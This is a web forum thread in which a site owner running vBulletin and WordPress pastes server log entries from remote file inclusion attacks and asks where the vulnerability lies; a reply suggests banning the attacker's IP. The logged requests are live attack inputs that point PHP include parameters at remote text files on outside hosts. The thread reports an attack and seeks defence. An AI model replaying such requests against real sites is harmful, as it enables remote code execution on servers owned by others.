How To Avoid Rfi Attack RFI Attack

[dheeraj4uuu 0]

Hello,

If this is not the correct forum please tell me where to post this question...

My site is been attacking by one hacker from past two days...with RFI attack..He was using the following code to attack my server..

"GET /archive/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/archive/index.php/environment.php?DIR_PREFIX=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 403 5380 "-" "Mozilla/5.0"

Can you tell me where the vulnarabillity is in or which file he was accessing...I have a vbulletin and wordpress running on it..Both have archives in it...I have given a complaint to my hosting company even they are helpless they are not finding where the problem is...

Another attack recently took was with the following logged in my error log

(36)File name too long: Cannot map GET /archive/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/archive/index.php/classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://212.227.74.68/catalog/safe.txt? HTTP/1.1 to file

[jlhaslip 4]

Look in the Error logs or in the Last Visitors Log to see if you can find the IP they are using then Ban that IP address.Might work.